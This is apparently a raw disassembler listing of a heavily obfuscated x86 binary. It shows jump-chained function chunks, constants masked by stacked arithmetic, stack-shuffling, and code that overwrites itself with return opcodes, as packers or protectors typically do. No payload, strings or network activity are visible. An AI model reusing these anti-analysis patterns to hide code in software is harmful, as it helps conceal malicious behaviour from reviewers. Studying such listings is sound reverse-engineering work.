; FUNCTION CHUNK AT 004504F1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004520C8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00453F3E SIZE 00000005 BYTES

		push	eax
		mov	eax, edi
		xchg	eax, [esp+4+var_4]
		push	0D120AFB4h
		jmp	loc_448F0B
sub_44DF1D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF09

loc_44DF2D:				; CODE XREF: sub_44CF09+9j
		cmp	al, 0A4h
		jz	loc_441FA1
		jmp	loc_450127
; END OF FUNCTION CHUNK	FOR sub_44CF09
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_231. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D3D0

loc_44DF3B:				; CODE XREF: sub_44D3D0-F228j
		jmp	nullsub_254
; END OF FUNCTION CHUNK	FOR sub_44D3D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44DF40:				; CODE XREF: sub_4448E2+274Dj
		and	ebp, 0B2860A1Eh

loc_44DF46:				; CODE XREF: sub_4448E2:loc_447027j
		add	eax, ds:4000F1h
		xor	eax, 69F2E50Ah
		add	eax, 9D915167h
		add	eax, ebp
		jmp	loc_45AA4D
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_44DF5F:				; CODE XREF: y2kk37jd:loc_43C178j
		and	edi, 0F5668755h
		add	edi, 0EF20FF91h
		xchg	edi, [esp]
		jmp	sub_442C3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_44DF73:				; CODE XREF: sub_457A46+2276j
		test	eax, 89A8D873h
		jmp	loc_448A43
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_44DF7E:				; CODE XREF: sub_4408B9:loc_453B06j
		add	edi, 454B0F5Bh
		xor	eax, edi
		pop	edi
		add	eax, 527706FDh
		jb	loc_4450A0
		jmp	loc_4538C5
; END OF FUNCTION CHUNK	FOR sub_4408B9
; ---------------------------------------------------------------------------
		mov	eax, 72B18749h
		push	ecx
		push	offset sub_43F5C5
		jmp	locret_44A548
; ---------------------------------------------------------------------------

loc_44DFA8:				; DATA XREF: y2kk37jd:00456A18o
		xchg	esi, [esp]
		mov	edx, esi
		pop	esi
		mov	eax, [esp]
		jmp	loc_45A2CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_44DFB6:				; CODE XREF: sub_448DCA:loc_44AAD9j
		mov	eax, [eax]
		call	sub_4410D8

loc_44DFBD:				; CODE XREF: sub_4562E5:loc_43FC28j
		rol	ebx, 6
		xchg	ecx, eax
		sub	ecx, edi
		jmp	sub_4497B0
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_44DFC9:				; CODE XREF: sub_44B924+B589j
		cmp	dword ptr [ebp-8], 0

loc_44DFCD:				; CODE XREF: sub_459789-8EE0j
		jle	loc_456D49
		mov	eax, [ebp-4]
		xor	edx, edx
		push	edx
		push	eax
		jmp	loc_45B2D8
; ---------------------------------------------------------------------------

loc_44DFDF:				; CODE XREF: sub_44B924:loc_456E9Cj
		push	offset loc_4594F2
		jmp	loc_45A877
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------

loc_44DFE9:				; CODE XREF: y2kk37jd:0044DCFAj
		jz	loc_443A1A
		jmp	loc_4440DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6B5

loc_44DFF4:				; CODE XREF: sub_44A6B5+B67Dj
		rol	eax, 10h
		not	edi

loc_44DFF9:				; CODE XREF: sub_44A6B5:loc_4483A4j
		call	sub_447977
		mov	edx, 0DDABAF17h

loc_44E003:				; CODE XREF: y2kk37jd:loc_44209Ej
		call	sub_440CD1
		push	eax
		ror	eax, 9
		jmp	loc_447970
; END OF FUNCTION CHUNK	FOR sub_44A6B5
; ---------------------------------------------------------------------------

loc_44E011:				; CODE XREF: y2kk37jd:00440157j
		shl	ebx, 1Dh
		jmp	sub_43C865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44E019:				; CODE XREF: sub_4458DD+72F4j
					; sub_4514DE+12ADj ...
		add	edi, 3A4577Ah
		sub	edi, 567775DFh
		test	edi, 800h
		jmp	loc_444221
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		xchg	eax, ecx
		jmp	loc_444D6A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_479. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E0DE

loc_44E038:				; CODE XREF: sub_43E0DE+17BE0j
		jmp	loc_4477C5
; END OF FUNCTION CHUNK	FOR sub_43E0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44E03D:				; CODE XREF: sub_4448E2+F8D1j
		jmp	sub_4476EE
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4450D1

loc_44E042:				; CODE XREF: sub_4450D1+19j
		xchg	ebx, [esp+8+var_8]
		jmp	loc_450A68
; END OF FUNCTION CHUNK	FOR sub_4450D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF09

loc_44E04A:				; CODE XREF: sub_453093-E57Ej
					; sub_44CF09+7365j
		js	loc_44F945
		not	ebx
		xor	esi, 0BF79F92Bh
		or	edx, eax
		jmp	loc_441FA1
; END OF FUNCTION CHUNK	FOR sub_44CF09
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_44E05F:				; CODE XREF: sub_448CAE:loc_4543B3j
		popf

loc_44E060:				; CODE XREF: sub_448CAE:loc_4519AFj
		push	0
		push	0
		push	10h
		jmp	loc_44A614
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_44E06B:				; CODE XREF: sub_4507BF:loc_44C72Fj
		cmp	dword ptr [ebp-10Ch], 76676264h
		jnz	loc_447BCD
		jmp	loc_445A16
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_44E080:				; CODE XREF: sub_43ED19+195Aj
		jo	loc_43D734

loc_44E086:				; CODE XREF: sub_43ED19:loc_43C9A8j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4513CE

loc_44E092:				; CODE XREF: y2kk37jd:00448986j
		jmp	loc_45A9DE
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413E3

loc_44E097:				; CODE XREF: sub_4413E3+1A857j
		pop	ebp
		jmp	loc_450BBD
; END OF FUNCTION CHUNK	FOR sub_4413E3
; ---------------------------------------------------------------------------

loc_44E09D:				; CODE XREF: y2kk37jd:0044946Dj
		add	ebx, 20CB167Eh
		sub	edx, ecx
		add	ebx, 6895A9CBh
		pop	ebx
		jmp	loc_45A274
; ---------------------------------------------------------------------------

loc_44E0B1:				; CODE XREF: y2kk37jd:loc_447D55j
		jnz	loc_4400AB
; START	OF FUNCTION CHUNK FOR sub_445F64

loc_44E0B7:				; CODE XREF: sub_445F64+D886j
		jmp	sub_44113A
; END OF FUNCTION CHUNK	FOR sub_445F64
; ---------------------------------------------------------------------------
		jno	loc_446066
		jb	loc_43BC88
		jmp	loc_4400A9
; ---------------------------------------------------------------------------

loc_44E0CD:				; CODE XREF: y2kk37jd:00453982j
		js	loc_44C57E

loc_44E0D3:				; CODE XREF: y2kk37jd:loc_4507A8j
		add	ebx, 5A661F68h
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_44E0D9:				; CODE XREF: sub_43D41D+2ABFj
		or	ebx, 5904EB99h
		add	ebx, 0A514961Eh
		jmp	loc_45A158
; END OF FUNCTION CHUNK	FOR sub_43D41D
; ---------------------------------------------------------------------------

loc_44E0EA:				; CODE XREF: y2kk37jd:loc_448D28j
		adc	edx, ecx
		jmp	loc_455C43

; =============== S U B	R O U T	I N E =======================================



sub_44E0F1	proc near		; CODE XREF: sub_4514DE+4F07p
					; y2kk37jd:0045AC76j

; FUNCTION CHUNK AT 00440903 SIZE 00000027 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	edx
		push	1B828A9Bh
		jmp	loc_440903
sub_44E0F1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEAB

loc_44E100:				; CODE XREF: sub_44CEAB-787Cj
		jge	loc_43DD29
		mov	[edi], ebx
		not	ebx
		js	loc_45146D
		jmp	loc_452BCF
; END OF FUNCTION CHUNK	FOR sub_44CEAB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_434. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_44E116:				; CODE XREF: sub_454413+59A1j
		jmp	loc_4451CA
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B79D

loc_44E11B:				; CODE XREF: sub_44B79D-1F5j
		xor	edx, edi
		or	eax, 46631DF7h
		and	ecx, esi
		pushf
		jmp	loc_4511CF
; END OF FUNCTION CHUNK	FOR sub_44B79D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44E12B:				; CODE XREF: sub_4448E2:loc_43CF5Dj
					; sub_44753E-7153j
		cmp	[ebp+var_4], 6
		jnz	loc_4511CF
		jmp	loc_452ACA
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44E13A:				; CODE XREF: sub_453867:loc_441769j
					; y2kk37jd:loc_44AA38j
		jz	loc_459D4A

loc_44E140:				; CODE XREF: sub_446861+10C43j
		jmp	loc_4449E5
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_44E145:				; CODE XREF: y2kk37jd:00452199j
		jmp	loc_440EF8
; ---------------------------------------------------------------------------

loc_44E14A:				; CODE XREF: y2kk37jd:00443A25j
		jmp	loc_456D63
; ---------------------------------------------------------------------------
		push	0C9E0451Fh
		add	ecx, ebx
; START	OF FUNCTION CHUNK FOR sub_45981F

loc_44E156:				; CODE XREF: sub_45981F+5j
		push	938D07CAh
		sub	ecx, ebp
		jmp	loc_459D44
; END OF FUNCTION CHUNK	FOR sub_45981F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443525

loc_44E162:				; CODE XREF: sub_443525:loc_4552AFj
		jnz	loc_4452A0
		jz	loc_45573C
		jmp	loc_44528E
; END OF FUNCTION CHUNK	FOR sub_443525
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_44E173:				; CODE XREF: sub_43B8D6:loc_44F081j
		xor	ebx, 4B82B8E0h
		add	ebx, 6B716634h
		xchg	ebx, [esp-4+arg_0]
		jmp	sub_43F5BD
; END OF FUNCTION CHUNK	FOR sub_43B8D6
; ---------------------------------------------------------------------------
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_63. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44E189:				; CODE XREF: y2kk37jd:004501F8j
		call	sub_4577FE
		test	al, al
		jz	nullsub_63
		jmp	loc_45B3D8
; ---------------------------------------------------------------------------

loc_44E19B:				; DATA XREF: sub_4507BF:loc_45173Ao
		push	0
		push	edx
		push	69414FDBh
		pop	edx
		xor	edx, 713B3AAFh
		sub	edx, 519B5D17h
		jmp	loc_4564A3
; ---------------------------------------------------------------------------

loc_44E1B5:				; CODE XREF: y2kk37jd:0045B399j
		or	edi, 0B7282BB2h
		and	ecx, 6579403Eh
		adc	edi, ecx
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_44E1C3:				; CODE XREF: sub_4514DE-6764j
		sub	esi, 36C51158h
		add	esi, 2AA64375h
		xchg	esi, [esp+10h+var_10]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
		mov	eax, 201E933Eh
		call	sub_442C3E
		mov	ds:off_41E0D4, eax
		push	offset sub_43E575
		jmp	locret_45C07C
; ---------------------------------------------------------------------------
		adc	edi, ecx
		sub	esi, ebx
		jmp	sub_458F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FB21

loc_44E1FA:				; CODE XREF: sub_44FB21:loc_43C769j
		mov	edx, esi

loc_44E1FC:				; CODE XREF: y2kk37jd:004519A2j
		pop	esi
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_44FC52
		mov	eax, 0B98DBDD7h
		call	sub_442C3E
		jmp	loc_441D69
; END OF FUNCTION CHUNK	FOR sub_44FB21
; ---------------------------------------------------------------------------

loc_44E215:				; CODE XREF: y2kk37jd:0044D7BAj
					; y2kk37jd:00458BEFj
		jl	loc_453C41
		sub	ebp, edi
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44E21D:				; CODE XREF: sub_4458DD:loc_44D7A8j
		or	eax, ds:4000ECh
		push	offset loc_43EF9A
		jmp	loc_43D2ED
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_44E22D:				; CODE XREF: sub_44AC89:loc_4492EBj
		jz	loc_445DB2
		jmp	loc_4545E2
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442829

loc_44E238:				; CODE XREF: sub_442829+752Ej
		push	9C78D5DEh
		mov	[edx], eax
		and	ecx, ebx
		or	eax, 19941ACBh
		jmp	loc_45735F
; END OF FUNCTION CHUNK	FOR sub_442829
; ---------------------------------------------------------------------------
		push	edi
		mov	edi, esi
		xchg	edi, [esp]
		push	0C8E8AC29h
		xchg	ecx, [esp]
		jmp	loc_45C6AD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_44E25F:				; CODE XREF: sub_44C4BC+AC8Fj
		cmp	eax, 2241F7C0h
		jmp	loc_4560FC
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_44E26A:				; CODE XREF: sub_45136B+30C3j
		jb	loc_45B72E
		jmp	loc_43B5CB
; END OF FUNCTION CHUNK	FOR sub_45136B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_338. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44E276:				; CODE XREF: sub_453867-2F6Fj
		jmp	sub_43FDE6
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_44E27B:				; CODE XREF: sub_44CF38:loc_44392Ej
		jle	loc_45B7C8
		and	ebp, edi
		jmp	loc_44C8F9
; END OF FUNCTION CHUNK	FOR sub_44CF38
; ---------------------------------------------------------------------------
		mov	eax, 78BDA40Ah
		call	sub_442C3E
		push	offset loc_44C338
		jmp	loc_44EC12
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_44E29C:				; CODE XREF: sub_44C4BC:loc_448267j
		cdq
		mov	ebx, 0E56FC140h
		shr	ebx, 0Bh
		jmp	loc_4438C3
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_438. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F34

loc_44E2AB:				; CODE XREF: sub_450F34+15j
		jmp	loc_44E5F5
; END OF FUNCTION CHUNK	FOR sub_450F34
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E9F

loc_44E2B0:				; CODE XREF: sub_451E9F-95B2j
		jmp	loc_43EF6E
; END OF FUNCTION CHUNK	FOR sub_451E9F

; =============== S U B	R O U T	I N E =======================================



sub_44E2B5	proc near		; DATA XREF: y2kk37jd:0045A39Eo
		call	sub_442C3E
		push	esi
		push	2F6B87F3h
		pop	esi
		xor	esi, 0B06A74B0h
		jmp	loc_4597EB
sub_44E2B5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44E2CC:				; CODE XREF: sub_4448E2:loc_458B60j
		mov	ecx, 2D37910Fh
		cmp	edi, 4B68130Ch
		jmp	loc_44A801
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457533

loc_44E2DC:				; CODE XREF: sub_457533+Aj
		mov	eax, ds:dword_44D2E4
		or	eax, eax
		jnz	loc_44A928
		jmp	loc_4406B8
; END OF FUNCTION CHUNK	FOR sub_457533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44E2EF:				; CODE XREF: sub_445226-2D10j
					; y2kk37jd:loc_44D873j
		jnb	loc_452413

loc_44E2F5:				; CODE XREF: sub_445226+80j
		call	sub_44CD48

loc_44E2FA:				; CODE XREF: sub_451843:loc_445DCFj
		sub	eax, 1D25644Dh
		add	eax, 4010A04Dh
		sub	eax, 58C56853h
		or	eax, 0CED654E5h
		add	eax, 0AC67052h
		add	eax, ebp
		add	eax, 156311ABh
		push	eax
		jmp	loc_4500EE
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_44E326:				; CODE XREF: y2kk37jd:0044C487j
		push	eax
		jmp	loc_44AF6E
; ---------------------------------------------------------------------------

loc_44E32C:				; CODE XREF: y2kk37jd:00457EDDj
		or	edx, edx
		jnz	loc_44D763
		jmp	loc_449CD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_44E339:				; CODE XREF: sub_445787+4A0Bj
		jl	loc_45456C
		and	ecx, 76546864h
		push	esi

loc_44E346:				; CODE XREF: sub_44615F:loc_4590CBj
		push	edi
		push	15B990C9h
		pop	edi

loc_44E34D:				; CODE XREF: sub_45B7AA:loc_44352Dj
		add	edi, 879F316Fh
		jmp	loc_450088
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
		dd 0E4E9CB85h
		db 0D5h, 0FEh, 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_44E35F	proc near		; CODE XREF: y2kk37jd:0043E8B7j
					; y2kk37jd:0045718Dp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045BBF3 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	edx, [esp-4+arg_0]
		jmp	loc_45BBF3
sub_44E35F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:dword_41E0C0, eax
		lea	eax, nullsub_451
		push	offset sub_457F40
		jmp	loc_43E85A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EAB

loc_44E381:				; CODE XREF: sub_443EAB:loc_44BF08j
		add	eax, 1420CAAh
		mov	eax, [eax]
		jmp	loc_43BFEA
; END OF FUNCTION CHUNK	FOR sub_443EAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DFE

loc_44E38E:				; CODE XREF: sub_449DFE:loc_445A09j
		xor	eax, eax
		push	edi
		push	0E194E70Ch
		pop	edi
		jmp	loc_45A8BD
; END OF FUNCTION CHUNK	FOR sub_449DFE

; =============== S U B	R O U T	I N E =======================================



sub_44E39C	proc near		; CODE XREF: y2kk37jd:0045496Aj
					; y2kk37jd:00454F3Ep
		xchg	esi, [esp+0]
sub_44E39C	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44E39F:				; CODE XREF: sub_4448E2:loc_447FCDj
		pop	esi
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_374
; END OF FUNCTION CHUNK	FOR sub_4448E2

; =============== S U B	R O U T	I N E =======================================



sub_44E3A8	proc near		; CODE XREF: sub_41BD8A+20p
					; sub_41BF8C+43p ...
		push	offset loc_455948
		jmp	nullsub_82
sub_44E3A8	endp

; ---------------------------------------------------------------------------

loc_44E3B2:				; CODE XREF: y2kk37jd:0044CE3Fj
		jb	loc_44B65D

; =============== S U B	R O U T	I N E =======================================



sub_44E3B8	proc near		; CODE XREF: sub_43D8F6+11p
					; y2kk37jd:0044A75Aj

arg_0		= dword	ptr  4

		xchg	eax, [esp+0]
		pop	eax
		mov	[ecx+0B8h], eax
		xchg	esi, [esp-4+arg_0]
		mov	ecx, esi
		pop	esi
		xor	eax, eax
		jmp	nullsub_478
sub_44E3B8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		pop	edx
		pop	eax
		push	esi
		push	9ADCBA51h
		pop	esi
		or	esi, 0ABE693C1h
		xor	esi, 32E017h
		rol	esi, 4
		jmp	loc_443166
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D412

loc_44E3EC:				; CODE XREF: sub_43D412+191CAj
		push	edi
		rol	ecx, 18h
		cdq
		jge	sub_453854

loc_44E3F7:				; CODE XREF: sub_43D412:loc_4565D4j
		and	ecx, 0CC256AC9h
		xor	ecx, 0D89368C5h
		add	ecx, 0AF927C1Ch
		jmp	loc_4406CE
; END OF FUNCTION CHUNK	FOR sub_43D412
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446861

loc_44E40E:				; CODE XREF: sub_446861:loc_446869j
		inc	eax
		mov	[ebp-24h], eax
		mov	dword ptr [ebp-18h], 0

loc_44E419:				; CODE XREF: sub_446861+11944j
		mov	eax, [ebp-14h]
		jmp	loc_45A502
; END OF FUNCTION CHUNK	FOR sub_446861
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F84

loc_44E421:				; CODE XREF: sub_458F84:loc_448CA9j
		push	edi
		push	0DF7CD9C5h
		pop	edi
; END OF FUNCTION CHUNK	FOR sub_458F84
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_44E428:				; CODE XREF: sub_44107E:loc_447E78j
		sub	edi, 0F2265FA3h
		jnz	loc_4558F6
		js	loc_44AC84
		xchg	edi, [eax]
		jmp	loc_4558F6
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_44E441:				; CODE XREF: sub_440337+8B5Aj
		jz	loc_44720E
		jmp	loc_43FBCD
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B08

loc_44E44C:				; CODE XREF: sub_455B08-166D1j
		mov	byte ptr [eax],	0C3h
		jmp	sub_43D005
; END OF FUNCTION CHUNK	FOR sub_455B08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D005

loc_44E454:				; CODE XREF: sub_43D005j
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	offset loc_456E12
		jmp	nullsub_83
; END OF FUNCTION CHUNK	FOR sub_43D005
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4432FD

loc_44E462:				; CODE XREF: sub_4432FD+Dj
					; y2kk37jd:00452A10j
		add	ebx, 76EEA79h
		add	eax, ebx
		pop	ebx
		mov	[ebp-4], eax
		jmp	loc_441D64
; END OF FUNCTION CHUNK	FOR sub_4432FD
; ---------------------------------------------------------------------------

loc_44E473:				; CODE XREF: y2kk37jd:loc_459462j
		mov	ecx, edx
		xchg	ecx, [esp]
		push	esi
		push	9095F3D7h
		pop	esi
		add	esi, 68C96D87h
		xor	esi, 145265ACh
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_44E48B:				; CODE XREF: sub_43F346:loc_43FA49j
		jmp	loc_4595C8
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------

loc_44E490:				; CODE XREF: y2kk37jd:loc_44F86Ej
		call	sub_44D8CE
; START	OF FUNCTION CHUNK FOR sub_45024B

loc_44E495:				; CODE XREF: sub_45024B+CB5j
		jmp	nullsub_102
; END OF FUNCTION CHUNK	FOR sub_45024B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_488. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451F6F

loc_44E49B:				; CODE XREF: sub_451F6F+13j
		mov	ds:dword_4470E0, eax
		jmp	loc_44296F
; END OF FUNCTION CHUNK	FOR sub_451F6F

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44E4A5	proc near		; CODE XREF: sub_4476EEj

; FUNCTION CHUNK AT 0043BF4A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044296F SIZE 00000014 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		cmp	ds:dword_4470E0, 0
		jnz	loc_44296F
		push	offset sub_44977F
		jmp	loc_43BF4A
sub_44E4A5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44E4C0	proc near		; DATA XREF: sub_449E69+6A79o
		or	[edx-8], eax
		jmp	loc_44F7BC
sub_44E4C0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_44E4C8:				; CODE XREF: sub_452C0C-167BBj
					; sub_44AAA1+1117Fj
		cmp	dword ptr [ebp-10h], 1
		jnz	loc_44893F
		mov	eax, [ebp+8]
		push	offset loc_44892B
		jmp	sub_455A2D
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------

locret_44E4DF:				; CODE XREF: y2kk37jd:loc_459B7Aj
		retn
; ---------------------------------------------------------------------------

loc_44E4E0:				; CODE XREF: y2kk37jd:0044EAC4j
		jb	loc_45BA58

; =============== S U B	R O U T	I N E =======================================



sub_44E4E6	proc near		; CODE XREF: sub_43B2EB+2141Ap
		xchg	eax, [esp+0]
		pop	eax
		call	sub_4526B7
		retn
sub_44E4E6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443CD

loc_44E4F0:				; CODE XREF: sub_4443CD+16A4Fj
		jmp	loc_44DC9A
; END OF FUNCTION CHUNK	FOR sub_4443CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_44E4F5:				; CODE XREF: sub_442A84:loc_44CA30j
		call	sub_44EE3D
		push	offset sub_43D8B6
		jmp	loc_4557D2
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------

loc_44E504:				; CODE XREF: y2kk37jd:00441CABj
		push	69B16C7h
		pop	edi
		rol	edi, 6
		xor	edi, 0E49CF543h
		jmp	loc_443C61
; ---------------------------------------------------------------------------

loc_44E518:				; CODE XREF: y2kk37jd:0045B8FDj
		jnz	loc_43B270
		jmp	loc_45C1D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457C64

loc_44E523:				; CODE XREF: sub_457C64+9j
		mov	edx, ebx
		pop	ebx
		lea	eax, sub_45C5C5
		mov	byte ptr [eax],	0C3h
		jmp	loc_44EB9E
; END OF FUNCTION CHUNK	FOR sub_457C64

; =============== S U B	R O U T	I N E =======================================



sub_44E534	proc near		; CODE XREF: sub_413F36j
					; sub_44E534:loc_43BD02j
					; DATA XREF: ...

; FUNCTION CHUNK AT 0043BD02 SIZE 00000006 BYTES

		call	sub_43BD0D
		jmp	loc_43BD02
sub_44E534	endp

; ---------------------------------------------------------------------------

loc_44E53E:				; CODE XREF: y2kk37jd:loc_44628Aj
		add	ecx, 421C8EF0h
		sub	ecx, 0D67C5Bh
		js	loc_43B8FD
		and	esi, 8A857FF7h
		jmp	loc_44B7D4
; ---------------------------------------------------------------------------

locret_44E55B:				; CODE XREF: y2kk37jd:loc_45AF9Ej
		retn
; ---------------------------------------------------------------------------

loc_44E55C:				; CODE XREF: y2kk37jd:loc_45A8B3j
		pop	ebx
		rol	ebx, 17h
		add	ebx, 0BAF952DAh
		xchg	ebx, [esp]
		jmp	sub_45ADEC
; ---------------------------------------------------------------------------
		mov	ds:off_41E0B8, eax
		lea	eax, sub_453583

loc_44E57A:				; CODE XREF: y2kk37jd:0044D6EEj
		mov	byte ptr [eax],	0C3h
		jmp	loc_442B98
; ---------------------------------------------------------------------------
		call	nullsub_321
		jmp	ds:dword_41E0BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438B1

loc_44E58D:				; CODE XREF: sub_4438B1-8168j
		jmp	loc_44B183
; END OF FUNCTION CHUNK	FOR sub_4438B1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_321. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jz	loc_452553
		jmp	loc_44EEF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B86B

loc_44E59E:				; CODE XREF: sub_44B86B:loc_4491E4j
		pop	edi
		mov	eax, [esp+0]
		push	edx
		push	esi
		push	6F268842h

loc_44E5A9:				; CODE XREF: y2kk37jd:loc_452981j
		jmp	loc_43F194
; END OF FUNCTION CHUNK	FOR sub_44B86B
; ---------------------------------------------------------------------------
